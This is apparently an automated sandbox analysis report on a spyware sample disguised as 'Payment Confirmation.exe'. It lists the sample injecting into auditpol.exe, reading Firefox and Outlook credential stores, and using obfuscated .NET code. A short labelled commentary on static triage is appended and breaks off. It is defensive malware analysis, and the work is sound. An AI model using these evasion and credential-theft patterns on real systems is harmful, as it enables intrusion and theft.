                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_0330B0D010_2_0330B0D0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_0331579010_2_03315790
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_0331397B10_2_0331397B
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_0331398010_2_03313980
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_0332BE8010_2_0332BE80
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03B6E33510_2_03B6E335
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03B6E7EC10_2_03B6E7EC
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03B6E45310_2_03B6E453
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03B6CB5810_2_03B6CB58
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03B6D8B810_2_03B6D8B8
Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: String function: 01A15130 appears 58 times
Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: String function: 01A5F290 appears 105 times
Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: String function: 01A4EA12 appears 86 times
Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: String function: 01A27E54 appears 111 times
Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: String function: 019CB970 appears 280 times
Source: C:\Windows\SysWOW64\auditpol.exe | Code function: String function: 03D17E54 appears 111 times
Source: C:\Windows\SysWOW64\auditpol.exe | Code function: String function: 03D3EA12 appears 86 times
Source: C:\Windows\SysWOW64\auditpol.exe | Code function: String function: 03CBB970 appears 280 times
Source: C:\Windows\SysWOW64\auditpol.exe | Code function: String function: 03D4F290 appears 105 times
Source: C:\Windows\SysWOW64\auditpol.exe | Code function: String function: 03D05130 appears 58 times
Source: Payment Confirmation.exe, 00000003.00000002.1288340324.000000000126E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Payment Confirmation.exe
Source: Payment Confirmation.exe, 00000003.00000002.1295515072.0000000008260000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs Payment Confirmation.exe
Source: Payment Confirmation.exe, 00000003.00000000.1272154268.0000000000C44000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenametrbp.exe* vs Payment Confirmation.exe
Source: Payment Confirmation.exe, 00000007.00000002.1550004144.0000000001477000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAUDITPOL.EXEj% vs Payment Confirmation.exe
Source: Payment Confirmation.exe, 00000007.00000002.1550286836.0000000001ACD000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Payment Confirmation.exe
Source: Payment Confirmation.exe | Binary or memory string: OriginalFilenametrbp.exe* vs Payment Confirmation.exe
Source: Payment Confirmation.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Payment Confirmation.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, kVqslxTTKp7XX8M7jb.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, kVqslxTTKp7XX8M7jb.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, ISCjAwD8rEKIcVdNMM.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, ISCjAwD8rEKIcVdNMM.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, ISCjAwD8rEKIcVdNMM.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/2@15/9
Source: C:\Users\user\Desktop\Payment Confirmation.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment Confirmation.exe.log
Source: C:\Users\user\Desktop\Payment Confirmation.exe | Mutant created: NULL
Source: C:\Windows\SysWOW64\auditpol.exe | File created: C:\Users\user\AppData\Local\Temp\f37-37I
Source: Payment Confirmation.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\Payment Confirmation.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: auditpol.exe, 0000000A.00000002.3729900422.000000000357A000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000002.3729900422.0000000003545000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000003.1733683333.000000000357A000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000003.1733683333.0000000003545000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Payment Confirmation.exe | Virustotal: Detection: 30%
Source: Payment Confirmation.exe | ReversingLabs: Detection: 36%
Source: unknown | Process created: C:\Users\user\Desktop\Payment Confirmation.exe "C:\Users\user\Desktop\Payment Confirmation.exe"
Source: C:\Users\user\Desktop\Payment Confirmation.exe | Process created: C:\Users\user\Desktop\Payment Confirmation.exe "C:\Users\user\Desktop\Payment Confirmation.exe"
Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | Process created: C:\Windows\SysWOW64\auditpol.exe "C:\Windows\SysWOW64\auditpol.exe"
Source: C:\Windows\SysWOW64\auditpol.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Payment Confirmation.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Payment Confirmation.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Payment Confirmation.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Payment Confirmation.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Payment Confirmation.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Payment Confirmation.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Payment Confirmation.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Payment Confirmation.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Payment Confirmation.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Payment Confirmation.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Payment Confirmation.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Payment Confirmation.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Payment Confirmation.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Payment Confirmation.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\Payment Confirmation.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\Payment Confirmation.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\Payment Confirmation.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\Payment Confirmation.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Payment Confirmation.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Payment Confirmation.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\auditpol.exe | Section loaded: auditpolcore.dll
Source: C:\Windows\SysWOW64\auditpol.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\auditpol.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\auditpol.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\auditpol.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\auditpol.exe | Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\auditpol.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\auditpol.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\auditpol.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\auditpol.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\auditpol.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\auditpol.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\auditpol.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\auditpol.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\auditpol.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\auditpol.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\auditpol.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\auditpol.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\auditpol.exe | Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\auditpol.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\auditpol.exe | Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\auditpol.exe | Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\auditpol.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\auditpol.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\auditpol.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | Section loaded: wininet.dll
Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | Section loaded: mswsock.dll
Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Payment Confirmation.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\Payment Confirmation.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\auditpol.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Payment Confirmation.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Payment Confirmation.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Payment Confirmation.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: trbp.pdb source: Payment Confirmation.exe
                Source: Binary string: auditpol.pdbGCTL source: Payment Confirmation.exe, 00000007.00000002.1550004144.0000000001477000.00000004.00000020.00020000.00000000.sdmp, yT3kwEipvxIo4KXERrb.exe, 00000009.00000002.3730747872.00000000010AE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: Payment Confirmation.exe, 00000007.00000002.1550286836.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000003.1552521292.0000000003ADD000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000002.3731867390.0000000003C90000.00000040.00001000.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000003.1549442641.0000000003926000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000002.3731867390.0000000003E2E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Payment Confirmation.exe, Payment Confirmation.exe, 00000007.00000002.1550286836.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, auditpol.exe, auditpol.exe, 0000000A.00000003.1552521292.0000000003ADD000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000002.3731867390.0000000003C90000.00000040.00001000.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000003.1549442641.0000000003926000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000002.3731867390.0000000003E2E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: auditpol.pdb source: Payment Confirmation.exe, 00000007.00000002.1550004144.0000000001477000.00000004.00000020.00020000.00000000.sdmp, yT3kwEipvxIo4KXERrb.exe, 00000009.00000002.3730747872.00000000010AE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: trbp.pdbSHA256@} source: Payment Confirmation.exe
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: yT3kwEipvxIo4KXERrb.exe, 00000009.00000002.3729563719.000000000049F000.00000002.00000001.01000000.0000000A.sdmp, yT3kwEipvxIo4KXERrb.exe, 0000000B.00000000.1619731121.000000000049F000.00000002.00000001.01000000.0000000A.sdmp
                Source: Payment Confirmation.exe | Static PE information: 0xC0F8C2D1 [Thu Aug 4 09:24:33 2072 UTC]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 3_2_015BDA4B pushfd ; retf | 3_2_015BDA81
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 3_2_015BDA82 push eax; retf | 3_2_015BDA85
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 3_2_0753C603 pushad ; ret | 3_2_0753C609
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 3_2_0757ED39 push 4C076FBEh; retf | 3_2_0757ED45
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 7_2_00424273 push esi; retf | 7_2_0042427E
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 7_2_004053BC push ds; ret | 7_2_004053D0
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 7_2_00403480 push eax; ret | 7_2_00403482
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 7_2_00418583 push edi; iretd | 7_2_004185A1
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 7_2_019A225F pushad ; ret | 7_2_019A27F9
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 7_2_019A27FA pushad ; ret | 7_2_019A27F9
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 7_2_019D09AD push ecx; mov dword ptr [esp], ecx | 7_2_019D09B6
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 7_2_019A283D push eax; iretd | 7_2_019A2858
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 7_2_019A1368 push eax; iretd | 7_2_019A1369
                Source: C:\Windows\SysWOW64\auditpol.exe | Code function: 10_2_03CC09AD push ecx; mov dword ptr [esp], ecx | 10_2_03CC09B6
                Source: C:\Windows\SysWOW64\auditpol.exe | Code function: 10_2_0331A21B push ebp; ret | 10_2_0331A230
                Source: C:\Windows\SysWOW64\auditpol.exe | Code function: 10_2_0331A15F push 0000001Ah; retf | 10_2_0331A14A
                Source: C:\Windows\SysWOW64\auditpol.exe | Code function: 10_2_0331A1E5 push ebp; ret | 10_2_0331A230
                Source: C:\Windows\SysWOW64\auditpol.exe | Code function: 10_2_0331A0E0 push 0000001Ah; retf | 10_2_0331A14A
                Source: C:\Windows\SysWOW64\auditpol.exe | Code function: 10_2_0331A0D5 push 0000001Ah; retf | 10_2_0331A14A
                Source: C:\Windows\SysWOW64\auditpol.exe | Code function: 10_2_0331C743 push esp; ret | 10_2_0331C74B
                Source: C:\Windows\SysWOW64\auditpol.exe | Code function: 10_2_03320DF0 push esi; retf | 10_2_03320DFB
                Source: C:\Windows\SysWOW64\auditpol.exe | Code function: 10_2_03315100 push edi; iretd | 10_2_0331511E
                Source: C:\Windows\SysWOW64\auditpol.exe | Code function: 10_2_0331554D pushfd ; ret | 10_2_03315555
                Source: C:\Windows\SysWOW64\auditpol.exe | Code function: 10_2_03323A70 push ss; retn 5CD7h | 10_2_03323A8F
                Source: C:\Windows\SysWOW64\auditpol.exe | Code function: 10_2_0331787C push ecx; retf | 10_2_0331787D
                Source: C:\Windows\SysWOW64\auditpol.exe | Code function: 10_2_03301F39 push ds; ret | 10_2_03301F4D
                Source: C:\Windows\SysWOW64\auditpol.exe | Code function: 10_2_03B6C2A5 push FFFFFF83h; ret | 10_2_03B6C2AC
                Source: C:\Windows\SysWOW64\auditpol.exe | Code function: 10_2_03B60746 push edi; ret | 10_2_03B60747
                Source: C:\Windows\SysWOW64\auditpol.exe | Code function: 10_2_03B6B691 push cs; iretd | 10_2_03B6B6D4
                Source: C:\Windows\SysWOW64\auditpol.exe | Code function: 10_2_03B65453 push ecx; iretd | 10_2_03B6546F
                Source: C:\Windows\SysWOW64\auditpol.exe | Code function: 10_2_03B659FB push edx; retf | 10_2_03B65A00
                Source: Payment Confirmation.exe | Static PE information: section name: .text entropy: 7.583443478976572
                Source: 3.2.Payment Confirmation.exe.76c0000.3.raw.unpack, RXv2gXFWfOHdOu5o4x.cs | High entropy of concatenated method names: 'Dispose', 'RXvF2gXWf', 'n2Bp3KX6LyhTbP96rs', 'HAstR11TVar3Xj672y', 'xsAVXGkykj1GusshJD', 'JGFM2jecZvOttkGp4k', 'HHpSMXNqrPUQ9uRakI', 'ranpYVVsY7udN56k77', 'p5pu9YMFbrUFoKYFkw', 'AbP9nkAg30G7nF7ARo'
                Source: 3.2.Payment Confirmation.exe.76c0000.3.raw.unpack, gaWNLGnov1rlIG3v4D.cs | High entropy of concatenated method names: 'RQZhEfdal', 'elpwuw9vg', 'C7SvONiOb', 'aZJEKrY9W', 'sgWQQRlj4', 'RrdjBPCmS', 'Sy8pMxXYf', 'wHiomWuqF', 'Mi7rXdWnP', 'uih5bqCV1'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, d24MfJ7JLTHOv9klLl.cs | High entropy of concatenated method names: 'O5Ykjm7Iq5', 'xitk1Vdasm', 'LVwkCryyYN', 'FlpkA6hN05', 'c3SkY1QNnU', 'ktRkPeM5J0', 'bKIkxubKLE', 'oR0kTKKXlY', 'kTakt9nmdY', 'lj9kvDw7GS'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, cxYCwFOHgRaqQ6m5if.cs | High entropy of concatenated method names: 'Dispose', 'mIrIslpo2U', 's9G35BNBv3', 'qb6cTDLos3', 'uJkIZidiON', 'rRQIzP1EAn', 'ProcessDialogKey', 'TgR3NifPhr', 'QaQ3ISJZnW', 'Pa133qyU9I'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, p4kh4Qt5SDyccaB7jc.cs | High entropy of concatenated method names: 'SpdwAfTmqQ', 'rVnwPcW63i', 'uihwTEjEcE', 'LKOwtYi9fi', 'lTAwW3dKPl', 'xh3wX57ikH', 'sauw4YuhwW', 'EZXwFwjIiF', 'svcwiXErOo', 'JtZwBwsbZS'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, STPbeOarolG1pqNaA3.cs | High entropy of concatenated method names: 'JYU490vRsb', 'lTD4ZGuxGv', 'C6XFN1OZRU', 'g4iFI9eVK1', 'oel4nsvph5', 'jbZ4LeIRhn', 'BTR4SRAqUV', 'hNC4KHULwI', 'zmf48OBlAd', 'FZa4f7cq2f'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, MK17evKUqtic4cSLFh.cs | High entropy of concatenated method names: 'woNWc0bpBq', 'cVlWLlZSSI', 'q0MWKRqo89', 'MDaW8o4gu3', 'dVXW5BdQ9l', 'rvNW65Dr00', 'xKkW0iy97h', 'uPyWeSWGhK', 'N3YWphcBXe', 'Os5Wrw3NH2'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, GEuX4sz96q2Gv6RX4n.cs | High entropy of concatenated method names: 'G6OBPud4bw', 'X6xBTeVJ0v', 'jRdBtoH4VK', 'BOnBhnxd5U', 'ItOB5UT4VJ', 'yIwB0nVnLb', 'VfmBeSR2or', 'H8UBHbccZ4', 'DORBjQm4n9', 'qOrB104keL'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, JUYqsbMu1RIrlpo2UG.cs | High entropy of concatenated method names: 'MOjiW0SAl4', 'arvi4L22Ok', 'mHwiiQliqL', 'wO1idGKVfL', 'no1iJuVwLd', 'JrjiHL4oDG', 'Dispose', 'gapFQAsrTY', 'VNUFOAQ3Gd', 'K8NFwEIpo3'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, lAGES4SpJBJatUlsbc.cs | High entropy of concatenated method names: 'Ab2qTQbD1X', 'BGnqt7MFmq', 'KPWqh2ZYsr', 'x2Bq5AFA6K', 'ispq0q8tgW', 'eXQqeRP6Di', 'dHlqrGDa8G', 'KbKqVsn2Jj', 'mQkqclUxOr', 'CJtqnCuifV'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, kVqslxTTKp7XX8M7jb.cs | High entropy of concatenated method names: 'T1LOKQnqBx', 'dlrO87vBUO', 'V7cOfya01Q', 'apLOuw5T99', 'aYkOEKSvlI', 'FQVOaeo5o0', 'j9EOM5sbl5', 'nOVO9X87C9', 'qOFOsJuK8M', 'AQeOZCmc0b'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, wPylGIpyjsYxXXTDLB.cs | High entropy of concatenated method names: 'TpPUfmaO47', 'Y7hUudtxiQ', 'bmdUE2CC8q', 'ToString', 'FA7UatwDHl', 'WTPUMGlZKM', 'a3T6YSEaJIuys5qexfu', 'kdmb8EE9WkLw5xmLIV0'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, e1UWDj0Y6JpbC9IK0r.cs | High entropy of concatenated method names: 'RlIUHc4M6x', 'zdeUjaa5Rb', 'GBHUCYYFPr', 'WEgUAYYMBb', 'tolUPc6wgN', 'vl5UxFj3sf', 'KSdUtZXkAO', 'UygUvpWtMX', 'qlDo0RE5cIAJYFOTfwh', 'PxJsDtErISNPYvV7kbL'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, mifPhrsSaQSJZnWLa1.cs | High entropy of concatenated method names: 'PkFihchRuI', 'SHNi5MdXLB', 'dbIi6VB1ma', 'HdTi0A3bfs', 'GcHie8qA6c', 'K68ip4q76T', 'uUjir38spI', 'p3EiV7tejN', 'YY7i7PXM5r', 'dKBicBA7J1'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, yls8CYr4oErVufRAOZ.cs | High entropy of concatenated method names: 'QcrkQ7BTw2', 'CuDkwiVxVt', 'ReukUJfHNk', 'VkxUZidsav', 'DZYUz5AToj', 'hOokNayO63', 'a5UkI659eL', 'VgJk33gs3N', 'CikkyiPPnO', 'ndGkmAgcOV'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, PUl2qBImbK2iC04k9Zj.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tZ5Gin40aJ', 'e7NGBSsKyb', 'yZYGdVMSv0', 'yHQGGAkwrI', 'FI0GJptdur', 'l8ZGgbGJwo', 'BC3GHx89uy'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, ISCjAwD8rEKIcVdNMM.cs | High entropy of concatenated method names: 'JKMybYRdEp', 'BMRyQi89hG', 'pKdyOc0qQF', 'gT0ywev2xY', 'DfFy2NEs4h', 'WVIyUQTKKR', 'CREykxOh06', 'jEZyDYpMZm', 'aP7yoiXnfd', 'XXxyRhGbPR'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, I5aJRgvLsrpLPEq9AE.cs | High entropy of concatenated method names: 'Lei2YxYTwU', 'RRq2xZxmY8', 'uyew6pfDdb', 'duqw0DT81K', 'aPEwettoou', 'W4DwpA6BlL', 'rjZwrMkpda', 'L6JwVmkaaH', 'elOw7p59Gg', 'QxcwcCEohh'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, hjKklx35Uhx1EMfj7Y.cs | High entropy of concatenated method names: 'lLEC25H5F', 'ATRAEYDps', 'KrrP0IqmA', 'O2WxHHkSU', 'qnht6YvyG', 'uOQvWVUVQ', 'eR9eyMTjH33Y1RW8D1', 'V8RpYIuo5MJQQ0LV4O', 'cCMF4Sb5B', 'pBxBHli3w'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, nyU9IFZh7J5KlB7TRi.cs | High entropy of concatenated method names: 'f1oBwleYYK', 'J0YB29Njtm', 'lTlBUDSm29', 'DSvBk7hitW', 'O5rBiBIIZu', 'feSBDcbGHU', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, ECEWAAINCMGfgGbkfsn.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MSnBnitajS', 'yHbBLwqDhn', 'zsBBS7L8dV', 'tQrBKAqUW7', 'xJxB8p7VIA', 'z8mBfw4G98', 'K12Bu1vIAb'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, Vf0JMHm2U8BDAwXhXB.cs | High entropy of concatenated method names: 'myDIkVqslx', 'DKpID7XX8M', 'f5SIRDycca', 't7jIlc05aJ', 'Uq9IWAE2aW', 'L1LIXbhY09', 'PmrFH9iwBTMPPqEvTg', 'dQs17lKBDAxXc6wwok', 'nFSF0vtoSoUEBJMSq1', 'gPFII2Ilnn'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, b1HwNtfm82y8F2LUjH.cs | High entropy of concatenated method names: 'ToString', 'jTpXnI6i1K', 'zcbX5I00G9', 's3PX6VK2rC', 'X9fX0n62Q3', 'cfqXeersv5', 'jGZXpf7IDl', 'fEPXrA0vbo', 'XZnXV79Nih', 'Lt9X7ugGr2'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, srxEJNII30ifhve8Jbm.cs | High entropy of concatenated method names: 'rxqBZiQowd', 'QBkBzyGfKH', 'BPtdNVPl7F', 'FhFdIOLyK6', 'PHZd3j88BV', 'EP9dyMxWu5', 'Ot0dmukyDd', 'jYbdbRsQ6C', 'zDOdQucvKy', 'zIVdORCSVy'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, haWV1LhbhY09vg95RU.cs | High entropy of concatenated method names: 'j6tUb7x7KB', 'RS4UOI7WwG', 'rfYU2iyj17', 'Xk4Ukty769', 'IVHUD95PjD', 'yMu2EdtBFm', 'gC02a895km', 'ytB2MJjo4v', 'V1O29bAxh8', 'HKP2sx0kxf'
                Source: 3.2.Payment Confirmation.exe.33ac828.0.raw.unpack, RXv2gXFWfOHdOu5o4x.cs | High entropy of concatenated method names: 'Dispose', 'RXvF2gXWf', 'n2Bp3KX6LyhTbP96rs', 'HAstR11TVar3Xj672y', 'xsAVXGkykj1GusshJD', 'JGFM2jecZvOttkGp4k', 'HHpSMXNqrPUQ9uRakI', 'ranpYVVsY7udN56k77', 'p5pu9YMFbrUFoKYFkw', 'AbP9nkAg30G7nF7ARo'
                Source: 3.2.Payment Confirmation.exe.33ac828.0.raw.unpack, gaWNLGnov1rlIG3v4D.cs | High entropy of concatenated method names: 'RQZhEfdal', 'elpwuw9vg', 'C7SvONiOb', 'aZJEKrY9W', 'sgWQQRlj4', 'RrdjBPCmS', 'Sy8pMxXYf', 'wHiomWuqF', 'Mi7rXdWnP', 'uih5bqCV1'
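The static findings above (DllCharacteristics flags, a TimeDateStamp of 0xC0F8C2D1 that decodes to the year 2072, a .text entropy of 7.58 bits/byte) and the "high entropy of concatenated method names" findings on the unpacked .NET payload are the kind of checks an analyst reproduces locally before trusting a sandbox verdict. The script below is an added example and not Joe Sandbox code: it builds a minimal PE32 image from the report's values (a constructed stand-in, not the real sample), decodes the header fields with the standard library only, and scores both section bytes and method-name strings with Shannon entropy. The 7.0 bits/byte and 5.0 bits/char cut-offs are this example's assumptions, not the sandbox's thresholds.

```python
"""Static triage of the findings above: PE flags, build timestamp, entropy.

Added example, not Joe Sandbox code. The PE image is constructed here from the
report's values; the entropy cut-offs are this example's own assumptions.
"""
import hashlib
import math
import struct
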